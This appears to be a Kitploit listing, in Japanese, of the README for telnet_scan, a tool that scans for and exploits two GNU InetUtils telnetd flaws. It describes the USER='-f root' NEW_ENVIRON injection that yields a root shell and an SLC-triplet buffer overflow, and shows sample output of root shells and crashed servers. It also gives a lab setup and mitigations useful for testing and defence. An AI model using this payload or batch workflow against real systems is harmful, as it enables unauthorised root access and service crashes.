Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
telnet_scan — スキャナー/エクスプロイター CVE-2026-24061 & CVE-2026-32746 | Kitploit
ツール/GitHubGitHub/ekomssavior/telnet_scan
脆弱性スキャナーエクスプロイトネットワークセキュリティペネトレーションテスト認証学習と教育バイナリエクスプロイトラボと実践
GitHubekomssavior/telnet_scan

telnet_scan

スキャナー/エクスプロイター CVE-2026-24061 & CVE-2026-32746

リポジトリを見る
11613ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Telnet脆弱性スキャナー (CVE-2026-24061 & CVE-2026-32746)

License:ek0ms

GNU InetUtils telnetdにおける2つの深刻な脆弱性を検出し(該当する場合は)悪用するPythonベースのセキュリティ評価ツール:

  • CVE-2026-24061 – USER環境変数インジェクションによる認証バイパス (CVSS 9.8)
  • CVE-2026-32746 – LINEMODE SLCハンドラにおける事前認証バッファオーバーフロー (CVSS 9.8)

重要な免責事項

このツールは、許可されたセキュリティテストおよび教育目的でのみ使用してください。
自分が所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は違法です。作者は、このツールの誤用または損害について一切の責任を負いません。自己責任で使用してください。

image1(1)

特徴

  • 単一ターゲットスキャン – 実行時にIPアドレスまたはドメイン名を入力
  • バッチスキャン – 複数のターゲットを含むファイル(1行に1つ)をアップロード
  • 選択的テスト – 各脆弱性を個別に、または両方をテスト
  • CVE-2026-24061の悪用 – 脆弱な場合、そのまま同じターミナルで対話型ルートシェルが起動
  • CVE-2026-32746の検出 – 制御されたクラッシュ検出により脆弱なシステムを特定
  • クリーンな端末処理 – 終了時に適切に復元されるRawモードシェル
  • 接続検証 – フィルタリングされたポート、オフラインサービス、実際の脆弱性を区別
  • 詳細デバッグ – TELNET_SCAN_VERBOSE=1 を設定すると、すべてのIACパケットとステップごとのエクスプロイトの流れを表示
  • Dockerラボ環境 – 安全なテスト用の自己完結型脆弱ターゲット
  • インストール

    root@kitploit:~
    git clone https://github.com/ekomsSavior/telnet_scan.git
    cd telnet_scan
    chmod +x telnet_scanner.py
    

    使用法

    基本実行

    root@kitploit:~
    python3 telnet_scanner.py
    

    Dockerラボ(安全なテスト)

    既知の脆弱性を持つターゲットに対してエクスプロイトをテストし、実際のシステムを危険にさらしません:

    root@kitploit:~
    cd lab
    docker compose up -d
    cd ..
    python3 telnet_scanner.py
    # ターゲット: 127.0.0.1, ポート: 2323
    

    このラボは、脆弱なGNU InetUtils 2.5 telnetdを分離されたコンテナ内で実行し、localhostにのみバインドします。ネットワークへの露出はありません。

    詳細モード

    Telnetハンドシェイクをデバッグし、ワイヤ上で何が起こっているかを正確に確認します:

    root@kitploit:~
    TELNET_SCAN_VERBOSE=1 python3 telnet_scanner.py
    

    詳細出力では以下が表示されます:

    • 送受信されるすべてのIACコマンド(DO/WILL/SB)
    • デコードされたTelnetオプション名
    • サブネゴシエーションのペイロード16進ダンプ
    • ステップごとのエクスプロイトの流れ(6ステップハンドシェイク)

    IMG_2498

    単一ターゲットのワークフロー

    1. オプション 1 を選択
    2. ターゲット(IPまたはドメイン、例: 192.168.1.100 または example.com)を入力
    3. ポートを指定(空欄の場合はデフォルト 23)
    4. テストタイプを選択:
      • 1 – 両方の脆弱性
      • 2 – CVE-2026-24061のみ(認証バイパス)
      • 3 – CVE-2026-32746のみ(バッファオーバーフロー)

    バッチスキャンのワークフロー

    1. ターゲットを1行に1つずつ記述したファイルを作成 targets.txt の例:
      root@kitploit:~
      192.168.1.100
      192.168.1.101
      10.0.0.50
      example.com
      # これはコメント行 - 無視されます
      
    2. オプション 2 を選択
    3. ファイル名を入力
    4. ポートを指定(デフォルトは 23)
    5. テストタイプを選択(1、2、または3)
    6. スキャナーは次の処理を行います:
      • 各ターゲットの進行状況を表示
      • 完了した結果を表示
      • 最後にサマリーテーブルを提供

    シェルが取得された場合

    CVE-2026-24061が成功した場合:

    1. 脆弱性が検出されます
    2. 同じターミナルウィンドウに直接対話型ルートシェルが表示されます
    3. コマンドを入力し、すぐに出力を確認できます(例: id、whoami、ls)
    4. Ctrl+C を押してシェルを終了し、スキャナーメニューに戻ります
    5. バッチスキャンの場合、シェルと対話するか、スキャンを続行するかを確認するプロンプトが表示されます

    別のターミナルや追加の手順は不要です。

    仕組み

    CVE-2026-24061 – 認証バイパス

    このエクスプロイトは、実際のGNU InetUtils telnetdとの互換性を確保するために、正確な6ステップのTelnetハンドシェイクに従います:

    1. サーバーのネゴシエーションを待機 – 最大15秒間、逆DNSと初期の DO オプションを待機
    2. WILLで応答 – TTYPE、TSPEED、XDISPLOC、NEW_ENVIRON を確認
    3. SB SENDを待機 – サーバーからのサブネゴシエーション要求
    4. エクスプロイトペイロードを送信 – NEW_ENVIRON サブネゴシエーションを介して USER="-f root" を設定
    5. 残りの交換を処理 – SGA、ECHO、LINEMODE、NAWS の DO/WILL に応答
    6. シェルを検出 – # 、root@、または $ プロンプトを検索

    キープアライブスレッドは2秒ごとに IAC NOP を送信し、ペイロードが処理される前にtelnetdの ttloop() がEOFを検出して exit(1) を呼ぶのを防ぎます。

    脆弱なtelnetdは -f root を /usr/bin/login に渡し、認証をバイパスして即座にルートシェルアクセスを許可します。

    CVE-2026-32746 – バッファオーバーフロー検出

    • LINEMODE オプション(RFC 1184)をネゴシエート
    • 500以上のSLCトリプレット(1500バイト以上)を送信し、固定サイズのバッファをオーバーフローさせる
    • 接続リセット/クラッシュを監視して脆弱性を確認

    接続検証

    • エクスプロイトを試行する前に、サービスの可用性を事前スキャン
    • 以下を区別:
      • フィルタリングされたポート(ファイアウォールによるブロック)
      • オフラインサービス(サービスが実行されていない)
      • 脆弱なサービス(エクスプロイト成功)

    サンプル出力

    単一ターゲット

    root@kitploit:~
    === Telnet脆弱性スキャナー ===
    1. 単一ターゲットのスキャン
    2. ファイルからターゲットをスキャン(1行に1つのIP/ホスト名)
    3. 終了
    
    オプションを選択: 1
    ポート(デフォルト 23): 
    
    どのテストを実行しますか?
    1. 両方
    2. CVE-2026-24061のみ(認証バイパス - 脆弱な場合シェルを提供)
    3. CVE-2026-32746のみ(バッファオーバーフロー検出)
    選択 [1-3]: 1
    ターゲット(IPまたはドメイン): 192.168.1.100
    
    [*] 192.168.1.100 を解決 -> 192.168.1.100
    [*] 192.168.1.100:23 をスキャン中...
    
    [*] サービスが到達可能か確認中...
    [+] サービスは到達可能
    
    [*] CVE-2026-24061(認証バイパス)をテスト中...
    [!] CVE-2026-24061: 脆弱 – シェル取得!
    
    ============================================================
    [+] ルートシェルを取得!現在対話型ルートシェルが起動しています。
    [+] ここに直接コマンドを入力してください。シェルを終了するには Ctrl+C を押します。
    ============================================================
    
    id
    uid=0(root) gid=0(root) groups=0(root)
    

    詳細モード出力(一部)

    root@kitploit:~
        [STEP 1/6] サーバーネゴシエーションを待機(最大15秒かかる場合があります)...
        [STEP 1/6] 48バイトを受信: fffb18fffb20fffb23fffb27...
               デコード: IAC DO TERMINAL-TYPE
               デコード: IAC DO TERMINAL-SPEED  
               デコード: IAC DO X-DISPLAY-LOCATION
               デコード: IAC DO NEW-ENVIRON
        [STEP 2/6] すべてのDOオプションにWILLで応答
        [STEP 3/6] SB SENDサブネゴシエーション要求を待機...
        [STEP 4/6] サブネゴシエーション応答を送信...
                   NEW-ENVIRON IS VAR USER VALUE "-f root"  *** エクスプロイト ***
        [STEP 5/6] 残りのオプションネゴシエーションを処理...
        [STEP 5/6] テキストを受信: 'root@vuln-lab:~# '
        [結果] 成功: USER="-f root" インジェクションによるパスワードなしルートログイン
    

    バッチスキャン

    root@kitploit:~
    === Telnet脆弱性スキャナー ===
    1. 単一ターゲットのスキャン
    2. ファイルからターゲットをスキャン(1行に1つのIP/ホスト名)
    3. 終了
    
    オプションを選択: 2
    ポート(デフォルト 23): 
    ターゲットを含むファイル名を入力(1行に1つ): targets.txt
    
    どのテストを実行しますか?
    1. 両方
    2. CVE-2026-24061のみ(認証バイパス - 脆弱な場合シェルを提供)
    3. CVE-2026-32746のみ(バッファオーバーフロー検出)
    選択 [1-3]: 1
    
    [*] targets.txt から3つのターゲットを読み込みました
    
    ==================================================
    [1/3] 192.168.1.100:23 をスキャン中
    ==================================================
    [*] 192.168.1.100 を解決 -> 192.168.1.100
    [+] サービスは到達可能
    
    [*] CVE-2026-24061 をテスト中...
    [!] CVE-2026-24061: 脆弱 – シェル取得!
    
    [?] シェルを取得しました!今すぐ対話しますか?(y/N): n
    
    [*] CVE-2026-32746 をテスト中...
    [+] サーバーはクラッシュしませんでした。脆弱ではない可能性が高い
    
    ==================================================
    [2/3] 192.168.1.101:23 をスキャン中
    ==================================================
    [-] 192.168.1.101:23 でサービスに到達できません
    
    ==================================================
    [3/3] example.com:23 をスキャン中
    ==================================================
    [*] example.com を解決 -> 93.184.216.34
    [+] サービスは到達可能
    
    [*] CVE-2026-24061 をテスト中...
    [+] 応答なし。依然として脆弱である可能性あり
    
    [*] CVE-2026-32746 をテスト中...
    [!] CVE-2026-32746: 脆弱(サーバーがクラッシュしました)
    
    ============================================================
    スキャンサマリー
    ============================================================
    192.168.1.100: CVE-2026-24061 に対して脆弱
    192.168.1.101: サービスに到達不可
    example.com: CVE-2026-32746 に対して脆弱
    ============================================================
    

    緩和策

    脆弱なシステムを発見した場合は、以下の修正を適用してください:

    1. GNU InetUtils をバージョン2.8以降にアップグレード
    2. telnetdを無効化 し、ネットワーク境界でTCP/23をブロック
    3. アクセスを信頼できるネットワークのみに制限
    4. ログを監視 して、NEW_ENVIRON USER の値が -f で始まる接続を確認

    開発とテスト

    Dockerラボ

    同梱の lab/ ディレクトリは、安全で再現可能なテスト環境を提供します:

    root@kitploit:~
    cd lab
    docker compose up -d
    # telnetdが初期化されるまで約10秒待つ
    python3 ../telnet_scanner.py
    # ターゲット: 127.0.0.1, ポート: 2323
    

    ラボの特徴:

    • ソースからコンパイルされたGNU InetUtils 2.5(脆弱なバージョン)
    • 分離されたコンテナ内でtelnetdを実行
    • localhost:2323 のみにバインド – 開発に安全
    • デバッグ用のテストユーザー(labuser:labpass123)を含む

    作業が終わったらラボを停止:

    root@kitploit:~
    cd lab && docker compose down
    

    既知の制限事項

    • オーバーフローテスト(CVE-2026-32746)は、ターゲットのtelnetdサービスをクラッシュさせる可能性があります
    • 対話型シェルでは、矢印キーや端末サイズ変更が完全にはサポートされていません
    • 一部のファイアウォールやネットワーク構成は、Telnetオプションネゴシエーションに干渉する可能性があります
    • Windowsユーザー: 対話型シェルにはUnixライクな端末(WSL、Cygwin、またはLinux/macOS)が必要です

    image0(2)

    謝辞

    @leetcrypt に特別な感謝を – 適切な6ステップハンドシェイク、キープアライブスレッド、詳細モード、Dockerラボは素晴らしいです!


    免責事項:許可されたセキュリティテストおよび教育目的のみに使用してください。

    ツールをダウンロード